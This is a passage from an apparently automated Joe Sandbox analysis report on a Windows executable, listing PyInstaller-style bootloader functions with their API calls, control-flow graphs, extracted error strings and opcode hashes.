7ff78da686d0 591->594 593->589 594->593
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                        • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                        • Instruction ID: 86c50e141fdaaecc99c5f8c7d154407f4b13856111a501c7bea3cad232770921
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9C10032B28A4185EB50EFA4D480AAC7765FB49B98FA40235DE6E577D4EF38D819C310
                                                                                                                                                                                                                                        Function 00007FF78DA583B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA5841B
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA5849E
                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA584BD
                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA584CB
                                                                                                                                                                                                                                        • FindClose.KERNEL32(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA584DC
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNELBASE(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA584E5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                        • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                        • Instruction ID: 01da515a63d8fca6656361562c890f095777a27c727821a4116db5e769d13be4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73413221A0C54285EA20BBA4E4589B9A370FB98764FF00631D9AD83AD5FF3CDD4DC712
                                                                                                                                                                                                                                        Function 00007FF78DA592F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                        • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                        • Instruction ID: 7acfea21dac7172148ce9ffb628e02fbf80a6bfeb7f581dcf08e414705153f4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9F0496261C641C6F7609F90B44DB76A360BB44778F740235D9AD456D4EF3CD44DCA11
                                                                                                                                                                                                                                        Function 00007FF78DA51950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 329 7ff78da51950-7ff78da5198b call 7ff78da545b0 332 7ff78da51c4e-7ff78da51c72 call 7ff78da5c5c0 329->332 333 7ff78da51991-7ff78da519d1 call 7ff78da57f80 329->333 338 7ff78da51c3b-7ff78da51c3e call 7ff78da600bc 333->338 339 7ff78da519d7-7ff78da519e7 call 7ff78da60744 333->339 342 7ff78da51c43-7ff78da51c4b 338->342 344 7ff78da51a08-7ff78da51a24 call 7ff78da6040c 339->344 345 7ff78da519e9-7ff78da51a03 call 7ff78da64f78 call 7ff78da52910 339->345 342->332 351 7ff78da51a45-7ff78da51a5a call 7ff78da64f98 344->351 352 7ff78da51a26-7ff78da51a40 call 7ff78da64f78 call 7ff78da52910 344->352 345->338 359 7ff78da51a7b-7ff78da51afc call 7ff78da51c80 * 2 call 7ff78da60744 351->359 360 7ff78da51a5c-7ff78da51a76 call 7ff78da64f78 call 7ff78da52910 351->360 352->338 371 7ff78da51b01-7ff78da51b14 call 7ff78da64fb4 359->371 360->338 374 7ff78da51b35-7ff78da51b4e call 7ff78da6040c 371->374 375 7ff78da51b16-7ff78da51b30 call 7ff78da64f78 call 7ff78da52910 371->375 381 7ff78da51b6f-7ff78da51b8b call 7ff78da60180 374->381 382 7ff78da51b50-7ff78da51b6a call 7ff78da64f78 call 7ff78da52910 374->382 375->338 389 7ff78da51b8d-7ff78da51b99 call 7ff78da52710 381->389 390 7ff78da51b9e-7ff78da51bac 381->390 382->338 389->338 390->338 391 7ff78da51bb2-7ff78da51bb9 390->391 394 7ff78da51bc1-7ff78da51bc7 391->394 396 7ff78da51bc9-7ff78da51bd6 394->396 397 7ff78da51be0-7ff78da51bef 394->397 398 7ff78da51bf1-7ff78da51bfa 396->398 397->397 397->398 399 7ff78da51bfc-7ff78da51bff 398->399 400 7ff78da51c0f 398->400 399->400 401 7ff78da51c01-7ff78da51c04 399->401 402 7ff78da51c11-7ff78da51c24 400->402 401->400 403 7ff78da51c06-7ff78da51c09 401->403 404 7ff78da51c2d-7ff78da51c39 402->404 405 7ff78da51c26 402->405 403->400 406 7ff78da51c0b-7ff78da51c0d 403->406 404->338 404->394 405->404 406->402
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA57F80: _fread_nolock.LIBCMT ref: 00007FF78DA5802A
                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF78DA51A1B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF78DA51B6A), ref: 00007FF78DA5295E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                        • Opcode ID: 71146916c0c9099706f714157d3aef073617a07ebfbf74c53cf41f504c15e58d
                                                                                                                                                                                                                                        • Instruction ID: f150497cc9db9e2cc3b7950791f2096e1d46cd7d836e82e32eafdcd02b72e33c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71146916c0c9099706f714157d3aef073617a07ebfbf74c53cf41f504c15e58d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5816371A0D68686EB60FB64E040AB9B3A0FF44744FB44431D98D87785FE3DE949C762
                                                                                                                                                                                                                                        Function 00007FF78DA51600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 407 7ff78da51600-7ff78da51611 408 7ff78da51637-7ff78da51651 call 7ff78da545b0 407->408 409 7ff78da51613-7ff78da5161c call 7ff78da51050 407->409 416 7ff78da51653-7ff78da51681 call 7ff78da64f78 call 7ff78da52910 408->416 417 7ff78da51682-7ff78da5169c call 7ff78da545b0 408->417 414 7ff78da5162e-7ff78da51636 409->414 415 7ff78da5161e-7ff78da51629 call 7ff78da52710 409->415 415->414 423 7ff78da5169e-7ff78da516b3 call 7ff78da52710 417->423 424 7ff78da516b8-7ff78da516cf call 7ff78da60744 417->424 431 7ff78da51821-7ff78da51824 call 7ff78da600bc 423->431 432 7ff78da516f9-7ff78da516fd 424->432 433 7ff78da516d1-7ff78da516f4 call 7ff78da64f78 call 7ff78da52910 424->433 439 7ff78da51829-7ff78da5183b 431->439 436 7ff78da51717-7ff78da51737 call 7ff78da64fb4 432->436 437 7ff78da516ff-7ff78da5170b call 7ff78da51210 432->437 445 7ff78da51819-7ff78da5181c call 7ff78da600bc 433->445 446 7ff78da51739-7ff78da5175c call 7ff78da64f78 call 7ff78da52910 436->446 447 7ff78da51761-7ff78da5176c 436->447 444 7ff78da51710-7ff78da51712 437->444 444->445 445->431 461 7ff78da5180f-7ff78da51814 446->461 451 7ff78da51802-7ff78da5180a call 7ff78da64fa0 447->451 452 7ff78da51772-7ff78da51777 447->452 451->461 454 7ff78da51780-7ff78da517a2 call 7ff78da6040c 452->454 462 7ff78da517da-7ff78da517e6 call 7ff78da64f78 454->462 463 7ff78da517a4-7ff78da517bc call 7ff78da60b4c 454->463 461->445 470 7ff78da517ed-7ff78da517f8 call 7ff78da52910 462->470 468 7ff78da517be-7ff78da517c1 463->468 469 7ff78da517c5-7ff78da517d8 call 7ff78da64f78 463->469 468->454 471 7ff78da517c3 468->471 469->470 474 7ff78da517fd 470->474 471->474 474->451
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                        • Opcode ID: 09250c35733c7288d494a8b559120a17bced8e02cc052d24a1c7d21c225d71f9
                                                                                                                                                                                                                                        • Instruction ID: e973284c489536ab344509efcee8815af89c3dcf702fe5c4537ab9227b9eae4e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09250c35733c7288d494a8b559120a17bced8e02cc052d24a1c7d21c225d71f9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF518C61A0C64392EA10BBA1A4409B9A360BF44B94FF44531EE5C47796FF3CED4DC762
                                                                                                                                                                                                                                        Function 00007FF78DA58850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,00000000,00007FF78DA53CBB), ref: 00007FF78DA588F4
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00007FF78DA53CBB), ref: 00007FF78DA588FA
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00007FF78DA53CBB), ref: 00007FF78DA5893C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA58A20: GetEnvironmentVariableW.KERNEL32(00007FF78DA5388E), ref: 00007FF78DA58A57
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA58A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF78DA58A79
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA682A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA682C1
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52810: MessageBoxW.USER32 ref: 00007FF78DA528EA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                        • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                        • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                        • Instruction ID: 03c41403b48fe886777d20a678d7c4bb17a0cf89f271af35568b4e09129edb04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7419311A0D642C0EA10BBB1A8559F992A1BF85B94FF40031ED5D977D6FE3CDD48C322
                                                                                                                                                                                                                                        Function 00007FF78DA51210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 599 7ff78da51210-7ff78da5126d call 7ff78da5bdf0 602 7ff78da51297-7ff78da512af call 7ff78da64fb4 599->602 603 7ff78da5126f-7ff78da51296 call 7ff78da52710 599->603 608 7ff78da512d4-7ff78da512e4 call 7ff78da64fb4 602->608 609 7ff78da512b1-7ff78da512cf call 7ff78da64f78 call 7ff78da52910 602->609 615 7ff78da51309-7ff78da5131b 608->615 616 7ff78da512e6-7ff78da51304 call 7ff78da64f78 call 7ff78da52910 608->616 620 7ff78da51439-7ff78da5144e call 7ff78da5bad0 call 7ff78da64fa0 * 2 609->620 619 7ff78da51320-7ff78da51345 call 7ff78da6040c 615->619 616->620 628 7ff78da5134b-7ff78da51355 call 7ff78da60180 619->628 629 7ff78da51431 619->629 636 7ff78da51453-7ff78da5146d 620->636 628->629 635 7ff78da5135b-7ff78da51367 628->635 629->620 637 7ff78da51370-7ff78da51398 call 7ff78da5a230 635->637 640 7ff78da5139a-7ff78da5139d 637->640 641 7ff78da51416-7ff78da5142c call 7ff78da52710 637->641 642 7ff78da5139f-7ff78da513a9 640->642 643 7ff78da51411 640->643 641->629 645 7ff78da513ab-7ff78da513b9 call 7ff78da60b4c 642->645 646 7ff78da513d4-7ff78da513d7 642->646 643->641 652 7ff78da513be-7ff78da513c1 645->652 648 7ff78da513d9-7ff78da513e7 call 7ff78da79ea0 646->648 649 7ff78da513ea-7ff78da513ef 646->649 648->649 649->637 651 7ff78da513f5-7ff78da513f8 649->651 654 7ff78da5140c-7ff78da5140f 651->654 655 7ff78da513fa-7ff78da513fd 651->655 656 7ff78da513c3-7ff78da513cd call 7ff78da60180 652->656 657 7ff78da513cf-7ff78da513d2 652->657 654->629 655->641 658 7ff78da513ff-7ff78da51407 655->658 656->649 656->657 657->641 658->619
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                        • Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                                                        • Instruction ID: 83bdeffa9b284bc39f9b9522989849a960c31d204fa483dd02379651e05699df
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D451C362A0D64281E660BB91A450BBAA2A0FF45B94FF44131ED4D877C5FF3CED49C312
                                                                                                                                                                                                                                        Function 00007FF78DA6ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF78DA6F11A,?,?,-00000018,00007FF78DA6ADC3,?,?,?,00007FF78DA6ACBA,?,?,?,00007FF78DA65FAE), ref: 00007FF78DA6EEFC
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF78DA6F11A,?,?,-00000018,00007FF78DA6ADC3,?,?,?,00007FF78DA6ACBA,?,?,?,00007FF78DA65FAE), ref: 00007FF78DA6EF08
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                        • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                        • Instruction ID: 1126761dc44b7070d7ee64aee631e087f04f19c47700a1495ac5ad41fce26ca2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB41E161B1DA02D1EE15EB56A804D75A291BF48B90FF88539DD1D87384FE3CED0DC222
                                                                                                                                                                                                                                        Function 00007FF78DA536B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF78DA53804), ref: 00007FF78DA536E1
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA53804), ref: 00007FF78DA536EB
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52C9E
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52D63
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52C50: MessageBoxW.USER32 ref: 00007FF78DA52D99
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                        • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                        • Instruction ID: 7717ac3ef6787c80bccf3a6e8d4662c83217e52139907c3021cf21ed31e9620a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
